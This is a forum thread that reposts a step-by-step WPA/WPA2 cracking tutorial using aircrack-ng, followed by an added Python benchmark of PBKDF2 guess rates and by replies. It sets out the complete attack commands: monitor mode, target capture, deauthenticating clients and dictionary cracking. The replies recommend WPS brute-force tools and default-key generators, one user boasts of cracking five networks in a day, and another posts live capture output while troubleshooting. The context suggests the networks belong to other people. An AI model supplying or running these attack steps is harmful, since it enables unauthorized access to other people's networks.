Nytro

How To Crack A WPA Key With Aircrack-ng


Posted

With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).

The network adapter I am going to use for WPA/WPA2 cracking is the Alfa AWUS036H; OS: BackTrack 5 R2.

Step 1 : Setting up your network device

To capture network traffic without being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:

Command # iwconfig (to find all wireless network interfaces and their status)


Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)


Step 2 : Reconnaissance

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:

Command # airodump-ng mon0 (monitors all channels, listing available access points and associated clients within range)


Step 3 : Capturing Packets

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:

Command # airodump-ng -c 1 --bssid AP_MAC -w data mon0 (where AP_MAC is the MAC address of the target access point; the BSSID filter is the double-dash option --bssid)


Step 4 : De-Authentication Technique

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point and MAC_Client is the MAC address of an associated client)


So, now we have successfully acquired a WPA Handshake.


Step 5 : Cracking WPA/WPA2

Once you have captured a four-way handshake, you also need a large/relevant dictionary file (commonly known as a wordlist) with common passphrases.

Command # aircrack-ng -w wordlist capture_file.cap (where wordlist is your dictionary file, and capture_file.cap is a .cap file with a valid WPA handshake)


Cracking WPA-PSK and WPA2-PSK only needs a handshake. After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.

Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.

About The Author

Shaharyar Shafiq is doing a Bachelor's in Computer Engineering at Hamdard University. He has done C|PTE (Certified Penetration Testing Engineering) and he is interested in network penetration testing and forensics.

Source: How To Crack A WPA Key With Aircrack-ng | Learn How To Hack - Ethical Hacking and security tips
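An added example, not from the article or the aircrack-ng project, showing why the offline stage scales the way the last two paragraphs of the article describe: every candidate passphrase costs a full PBKDF2-HMAC-SHA1 derivation (4096 iterations, salted with the SSID, as defined in IEEE 802.11i), so the time bound is simply wordlist size divided by the guess rate your hardware achieves. The wordlist size passed to the estimate is an assumed figure, and the guess rate is measured on the machine running the script.

```python
import hashlib
import time

# IEEE 802.11i PSK-to-PMK mapping: PBKDF2-HMAC-SHA1, salt = SSID,
# 4096 iterations, 256-bit output. This is the per-guess cost of any
# offline dictionary attack on a captured four-way handshake.
PBKDF2_ITERATIONS = 4096
PMK_LENGTH = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the Pairwise Master Key from a passphrase and SSID."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"),
        PBKDF2_ITERATIONS, PMK_LENGTH,
    )


def check_test_vector() -> bool:
    """Compare against the published IEEE 802.11i test vector (Annex H)."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return derive_pmk("password", "IEEE").hex() == expected


def measure_pmk_rate(ssid: str, samples: int = 100) -> float:
    """Return PMK derivations per second on this machine (single core)."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"candidate{i}", ssid)  # constructed throwaway guesses
    return samples / (time.perf_counter() - start)


def estimate_hours(wordlist_size: int, rate_per_second: float) -> float:
    """Worst-case hours to exhaust a wordlist at the given guess rate."""
    return wordlist_size / rate_per_second / 3600.0


if __name__ == "__main__":
    assert check_test_vector(), "PMK derivation does not match the 802.11i vector"
    ssid = "Sparge-ma"  # SSID taken from the thread's airodump output
    rate = measure_pmk_rate(ssid)
    # Assumed wordlist size, roughly the "tens of millions" the article cites.
    assumed_wordlist = 30_000_000
    print(f"{rate:,.0f} PMK/s on this machine")
    print(f"~{estimate_hours(assumed_wordlist, rate):,.1f} h to exhaust "
          f"{assumed_wordlist:,} candidates")
    # Same passphrase, different SSID: a different PMK, so precomputed
    # tables only help against networks with a common default SSID.
    print(derive_pmk("password", "IEEE") != derive_pmk("password", "Sparge-ma"))
```

Because the salt is the SSID, a non-default network name forces an attacker to pay the full PBKDF2 cost per guess per network, and a long random passphrase pushes the wordlist size beyond any practical rate.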

Posted

Spide, it's the same procedure. Above it teaches you step by step how to capture a handshake and then brute-force it using a dictionary.

Another method would be to check whether it has WPS enabled and brute-force that. Not all routers have WPS enabled, and not all that do are susceptible to the attacks, but in favourable cases the password comes out much faster.

If you really want to crack a WPA/WPA2 network, those are pretty much the methods.

Posted
thanks nitro

I'm waiting to save up the money for that TP-Link parabolic antenna and I'll come back with feedback

That's what I thought too, that this is the only solution, until I installed wifislax. I've already cracked 5 wireless networks in the last 24 hours, regardless of whether they were WEP, WPA or WPA2. So you can crack passwords just fine with your laptop's network card, you just need to know how.

Posted
That's what I thought too, that this is the only solution, until I installed wifislax. I've already cracked 5 wireless networks in the last 24 hours, regardless of whether they were WEP, WPA or WPA2. So you can crack passwords just fine with your laptop's network card, you just need to know how.

can you give me some advice too, in private?

thanks a lot

Posted (edited)

I have nothing to hide: install wifislax, which is much better than BackTrack in this area. GOYscript is something fantastic. GOYscript wep, wpa, wps does pretty much all the work. There is also WPSPinGenerator, which gives you the password instantly in the case of some routers. There is also Inflator, but GOYscript does the job better.

Edited by GarryOne
Posted

it gives me an error:

root@bt:~# airodump-ng -c 4 -bssid C8:3A:35:07:21:90 AP_MAC -w data mon0

Notice: You specified "-bssid". Did you mean "--bssid" instead?

yNotice: Channel range already given

"airodump-ng --help" for help.

root@bt:~# airodump-ng --bssid C8:3A:35:07:21:90 AP_MAC -w data mon0

"airodump-ng --help" for help.

root@bt:~#

can anyone help me? Thanks in advance.

Posted (edited)
it gives me an error:

can anyone help me? Thanks in advance.

You use either -b or --bssid, but in no case -bssid

But as a piece of advice, you're better off using GOYscript or Reaver than aircrack

any idea???


It doesn't find any network with WPS enabled

Edited by GarryOne
Posted

same nonsense with -c too

root@bt:~# airodump-ng -c 4 -b C8:3A:35:07:21:90 AP_MAC -w data mon0

Notice: Channel range already given

"airodump-ng --help" for help.

root@bt:~#

sorry for the double post but I've been struggling for about 2 hours

Posted (edited)

First of all, it's a notice, i.e. just a warning, so it doesn't affect you at all; you can ignore it. Secondly, you need to read the error "channel already given", meaning the channel is already known and you don't need to specify it again.

Drop aircrack and install the GOYscript module (you can find tutorials online), or install wifislax, which has all of these built in, and you just pick the network and GOYscript does all the work for you. You can also try WPSPinGenerator, which gives you the password instantly for some routers that have the default PIN.

Edited by GarryOne
Posted

You need to be near some Wi-Fi networks, otherwise how do you expect to crack anything? About 80% of routers have WPS enabled; if it doesn't find any for you, it means you don't really have Wi-Fi networks around you. Try GOYscript WEP, maybe you have WEP networks. I cracked 2 WEP networks, each in 6 minutes, with GOYscript WEP.

Posted

I still can't get a handshake

CH 4 ][ Elapsed: 11 mins ][ 2013-04-04 05:50

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C8:3A:35:07:21:90 -127 100 6805 550 1 4 54e. WPA2 CCMP PSK Sparge-ma

BSSID STATION PWR Rate Lost Frames Probe

C8:3A:35:07:21:90 48:5D:60:39:B4:6B -127 1e- 1 0 20636 Sparge-ma

05:46:27 Sending 64 directed DeAuth. STMAC: [48:5D:60:39:B4:6B] [ 2|58 ACKs]

it disconnects me, the laptop reconnects automatically, but it doesn't give me a handshake

Posted (edited)

I don't know which beta version of wifislax you downloaded... the latest is beta 13.

I don't know what wireless card you have... but it doesn't find the network and the associated client, without which you can't get a handshake!

For the moment there still isn't one.

Here's a demo for goyscriptWPA:

But if it's an ALICE network... haven't you searched the Italian sites for ALICE key generators? It's based on the MAC...

Even if you get a handshake, you can't do anything with it without a suitable dictionary. These, in 99% of cases, keep the default key.

Edited by sorelian
